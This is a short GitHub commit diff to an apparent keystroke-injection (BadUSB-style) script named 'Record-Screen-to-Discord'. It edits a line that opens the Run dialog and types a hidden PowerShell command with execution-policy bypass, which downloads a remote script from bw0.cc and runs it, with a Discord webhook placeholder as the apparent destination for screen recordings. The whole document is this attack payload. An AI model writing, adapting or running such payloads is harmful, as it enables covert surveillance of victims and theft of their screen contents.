Update Record-Screen-to-Discord.txt

This commit is contained in:
egieb
2025-06-18 15:16:07 +00:00
committed by GitHub
parent 21b5b6e0e0
commit 388a9ed418

View File

@@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm https://bw0.cc/dcscr | iex
STRING powershell -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; iex (irm bw0.cc/dcscr)
ENTER